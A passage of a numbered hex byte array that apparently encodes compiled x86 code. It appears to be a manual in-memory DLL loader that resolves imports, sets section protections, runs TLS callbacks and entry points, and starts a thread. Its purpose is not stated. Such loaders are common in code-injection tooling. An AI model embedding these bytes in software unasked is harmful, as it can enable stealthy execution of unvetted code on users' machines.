967 0xa8, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
968 0x84, 0x00, 0x0f, 0x84, 0x1f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
969 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xd8,
970 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x04, 0x8b,
971 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
972 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
973 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1e, 0xe0, 0xff, 0xff, 0x89, 0x85,
974 0x78, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x78, 0xff, 0xff, 0xff, 0x00, 0x0f,
975 0x84, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x10, 0x8b,
976 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45,
977 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0,
978 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84,
979 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79,
980 0x2f, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
981 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
982 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x54,
983 0xdd, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x44,
984 0x8b, 0x45, 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01,
985 0xd0, 0x89, 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x74, 0xff, 0xff,
986 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
987 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
988 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0e, 0xdd, 0xff,
989 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04,
990 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x6a, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01,
991 0x90, 0x83, 0x45, 0xd8, 0x20, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x04, 0x85,
992 0xc0, 0x0f, 0x85, 0xf6, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b, 0x50,
993 0x28, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x70,
994 0xff, 0xff, 0xff, 0x8b, 0x55, 0xa8, 0x8d, 0x85, 0x44, 0xfe, 0xff, 0xff,
995 0x89, 0xd3, 0xba, 0x3e, 0x00, 0x00, 0x00, 0x89, 0xc7, 0x89, 0xde, 0x89,
996 0xd1, 0xf3, 0xa5, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
997 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89,
998 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0x85, 0x10,
999 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44,
1000 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30,
1001 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c,
1002 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x3c, 0xff,
1003 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1004 0xff, 0xe8, 0xbe, 0x2b, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1005 0x00, 0x0f, 0x88, 0xfe, 0x08, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x4a, 0xfe,
1006 0xff, 0xff, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1007 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89,
1008 0x54, 0x24, 0x08, 0x8b, 0x55, 0x8c, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04,
1009 0x24, 0xe8, 0x44, 0x25, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x48,
1010 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x6c, 0x8b, 0x45, 0x08, 0x0f,
1011 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x3f, 0x8b, 0x45,
1012 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54,
1013 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1014 0x24, 0xe8, 0xda, 0x24, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x54,
1015 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1016 0x8b, 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0xbd, 0x24, 0x00, 0x00, 0xeb,
1017 0x1f, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1018 0xff, 0x89, 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xb0,
1019 0x89, 0x04, 0x24, 0xe8, 0xca, 0x24, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f,
1020 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xb2, 0x00,
1021 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89,
1022 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
1023 0xff, 0xff, 0xe8, 0x34, 0x2a, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d,
1024 0x90, 0x00, 0x0f, 0x88, 0x1c, 0x08, 0x00, 0x00, 0x83, 0x7d, 0x94, 0x00,
1025 0x74, 0x0a, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1026 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85,
1027 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x28, 0xc7,
1028 0x44, 0x24, 0x24, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00,
1029 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00, 0x00, 0x8d,
1030 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7, 0x44, 0x24,
1031 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00,
1032 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x1c,
1033 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0xff,
1034 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x91, 0x29, 0x00, 0x00, 0x89,
1035 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x97, 0x07, 0x00, 0x00,
1036 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff,
1037 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x08, 0x00, 0x00,
1038 0x00, 0x8d, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d,
1039 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1040 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd5, 0x29, 0x00, 0x00, 0x89, 0x45, 0x90,
1041 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x54, 0x07, 0x00, 0x00, 0xc7, 0x45,
1042 0xc4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x02, 0x00, 0x00, 0x8b, 0x8d,
1043 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1044 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1045 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0x50, 0xff, 0xff, 0xff, 0x8b, 0x8d,
1046 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1047 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1048 0x1f, 0x89, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x8b, 0x8d, 0x3c, 0xff, 0xff,
1049 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1,
1050 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0,
1051 0x01, 0x89, 0x85, 0x48, 0xff, 0xff, 0xff, 0x83, 0xbd, 0x4c, 0xff, 0xff,
1052 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x74,
1053 0x0c, 0xc7, 0x45, 0xbc, 0x80, 0x00, 0x00, 0x00, 0xe9, 0xed, 0x00, 0x00,
1054 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x15, 0x83, 0xbd,
1055 0x48, 0xff, 0xff, 0xff, 0x00, 0x74, 0x0c, 0xc7, 0x45, 0xbc, 0x20, 0x00,
1056 0x00, 0x00, 0xe9, 0xcf, 0x00, 0x00, 0x00, 0x83, 0xbd, 0x50, 0xff, 0xff,
1057 0xff, 0x00, 0x74, 0x38, 0x83, 0xbd, 0x4c, 0xff, 0xff, 0xff, 0x00, 0x74,
1058 0x2f, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff, 0x00, 0x75, 0x26, 0x8b, 0x45,
1059 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x0c,
1060 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00,
1061 0xc7, 0x45, 0xbc, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x8e, 0x00, 0x00, 0x00,
1062 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1063 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1064 0x00, 0x74, 0x09, 0xc7, 0x45, 0xbc, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x6a,
1065 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x74, 0x1b, 0x83, 0xbd, 0x4c,
1066 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1067 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x02, 0x00, 0x00, 0x00, 0xeb, 0x46,
1068 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x1b, 0x83, 0xbd, 0x4c,
1069 0xff, 0xff, 0xff, 0x00, 0x75, 0x12, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1070 0x00, 0x75, 0x09, 0xc7, 0x45, 0xbc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x22,
1071 0x83, 0xbd, 0x50, 0xff, 0xff, 0xff, 0x00, 0x75, 0x19, 0x83, 0xbd, 0x4c,
1072 0xff, 0xff, 0xff, 0x00, 0x74, 0x10, 0x83, 0xbd, 0x48, 0xff, 0xff, 0xff,
1073 0x00, 0x75, 0x07, 0xc7, 0x45, 0xbc, 0x08, 0x00, 0x00, 0x00, 0x8b, 0x8d,
1074 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02,
1075 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00,
1076 0x00, 0x00, 0x04, 0x85, 0xc0, 0x74, 0x07, 0x81, 0x4d, 0xbc, 0x00, 0x02,
1077 0x00, 0x00, 0x8b, 0x8d, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x9d, 0x3c, 0xff,
1078 0xff, 0xff, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0,
1079 0xc1, 0xe0, 0x03, 0x01, 0xd8, 0x8b, 0x40, 0x0c, 0x01, 0xc8, 0x89, 0x85,
1080 0x38, 0xfc, 0xff, 0xff, 0x0f, 0xb7, 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f,
1081 0xb7, 0xc0, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xc4, 0x73, 0x43, 0x8b, 0x8d,
1082 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc4, 0x8d, 0x50, 0x01, 0x89, 0xd0,
1083 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8, 0x8b, 0x40,
1084 0x0c, 0x89, 0xc3, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xc4,
1085 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x01, 0xc8,
1086 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x89, 0xd8, 0x29, 0xd0, 0x89, 0x85, 0x34,
1087 0xfc, 0xff, 0xff, 0xeb, 0x1e, 0x8b, 0x8d, 0x3c, 0xff, 0xff, 0xff, 0x8b,
1088 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03,
1089 0x01, 0xc8, 0x8b, 0x40, 0x10, 0x89, 0x85, 0x34, 0xfc, 0xff, 0xff, 0xc7,
1090 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4,
1091 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44,
1092 0x24, 0x10, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x34,
1093 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x38, 0xfc, 0xff,
1094 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
1095 0xe8, 0x45, 0x27, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00,
1096 0x0f, 0x88, 0xc7, 0x04, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01, 0x0f, 0xb7,
1097 0x85, 0x4a, 0xfe, 0xff, 0xff, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xc4, 0x0f,
1098 0x82, 0x65, 0xfd, 0xff, 0xff, 0xc7, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x00,
1099 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x34,
1100 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x85,
1101 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c,
1102 0x02, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x34, 0xfc, 0xff, 0xff, 0x89, 0x44,
1103 0x24, 0x08, 0x8d, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1104 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd2, 0x26, 0x00, 0x00,
1105 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x57, 0x04, 0x00,
1106 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1107 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00,
1108 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5f, 0x27, 0x00, 0x00,
1109 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x2a, 0x04, 0x00,
1110 0x00, 0x8b, 0x85, 0x04, 0xff, 0xff, 0xff, 0x89, 0x45, 0x84, 0x83, 0x7d,
1111 0x84, 0x00, 0x74, 0x57, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0xc2,
1112 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b,
1113 0x85, 0x6c, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd4, 0x83,
1114 0x7d, 0xd4, 0x00, 0x74, 0x32, 0xeb, 0x27, 0x8b, 0x45, 0xd4, 0x8b, 0x00,
1115 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1116 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14,
1117 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x45, 0xd4, 0x04, 0x8b, 0x45,
1118 0xd4, 0x8b, 0x00, 0x85, 0xc0, 0x75, 0xd0, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1119 0x83, 0xf8, 0x03, 0x0f, 0x85, 0xd9, 0x01, 0x00, 0x00, 0x8b, 0x95, 0x6c,
1120 0xfe, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
1121 0x85, 0x68, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0xc7,
1122 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01,
1123 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff,
1124 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c,
1125 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xbb, 0x02, 0x00, 0x00, 0x8b,
1126 0x85, 0xbc, 0xfe, 0xff, 0xff, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc,
1127 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x85, 0x64,
1128 0xff, 0xff, 0xff, 0x83, 0x7d, 0x84, 0x00, 0x0f, 0x84, 0x95, 0x02, 0x00,
1129 0x00, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x40, 0x18, 0x89, 0x45,
1130 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x84, 0x7f, 0x02, 0x00, 0x00, 0x8b,
1131 0x85, 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x1c, 0x8b, 0x85, 0x1c, 0xfc,
1132 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x85,
1133 0x64, 0xff, 0xff, 0xff, 0x8b, 0x50, 0x20, 0x8b, 0x85, 0x1c, 0xfc, 0xff,
1134 0xff, 0x01, 0xd0, 0x89, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x64,
1135 0xff, 0xff, 0xff, 0x8b, 0x50, 0x24, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
1136 0x01, 0xd0, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xc0, 0x05,
1137 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
1138 0x85, 0x5c, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
1139 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x54, 0xff, 0xff, 0xff, 0x8b,
1140 0x45, 0x0c, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1141 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2b, 0x20, 0x00,
1142 0x00, 0x85, 0xc0, 0x75, 0x37, 0x8b, 0x45, 0xc0, 0x05, 0xff, 0xff, 0xff,
1143 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x85, 0x58, 0xff, 0xff, 0xff, 0x01, 0xd0,
1144 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1145 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1146 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0xeb, 0x0e,
1147 0x83, 0x6d, 0xc0, 0x01, 0x83, 0x7d, 0xc0, 0x00, 0x0f, 0x85, 0x76, 0xff,
1148 0xff, 0xff, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xa5, 0x01, 0x00, 0x00,
1149 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0,
1150 0x74, 0x5c, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85,
1151 0xc0, 0x74, 0x22, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00,
1152 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
1153 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3e, 0xd4, 0xff,
1154 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
1155 0x74, 0x08, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0xeb, 0x08, 0x8b, 0x45,
1156 0x0c, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8,
1157 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0x3c, 0x01, 0x00, 0x00, 0x8b, 0x45,
1158 0xc8, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0xff, 0xd0, 0xe9, 0x2c, 0x01,
1159 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
1160 0x84, 0xc0, 0x74, 0x37, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00,
1161 0x00, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89,
1162 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xd1, 0xd3,
1163 0xff, 0xff, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1164 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8b,
1165 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
1166 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28,
1167 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00,
1168 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
1169 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
1170 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xff,
1171 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xff, 0xff,
1172 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1173 0x24, 0x04, 0xff, 0xff, 0x1f, 0x00, 0x8d, 0x85, 0x40, 0xfe, 0xff, 0xff,
1174 0x89, 0x04, 0x24, 0xe8, 0x30, 0x24, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83,
1175 0x7d, 0x90, 0x00, 0x78, 0x69, 0x8b, 0x85, 0x40, 0xfe, 0xff, 0xff, 0x8b,
1176 0x55, 0xb4, 0x89, 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1177 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1178 0x24, 0xe8, 0x45, 0x23, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1179 0x00, 0x79, 0x3b, 0xe9, 0xee, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0xff,
1180 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x44, 0xff, 0xff, 0xff,
1181 0x64, 0x8b, 0x00, 0x89, 0x85, 0x40, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x40,
1182 0xff, 0xff, 0xff, 0x8b, 0x40, 0x30, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x70,
1183 0xff, 0xff, 0xff, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xeb, 0x04, 0x90, 0xeb,
1184 0x01, 0x90, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1185 0xaa, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x00, 0x00,
1186 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1187 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89,
1188 0x44, 0x24, 0x08, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24,
1189 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x26, 0x23, 0x00,
1190 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x64, 0x8b, 0x85,
1191 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x08, 0x89,
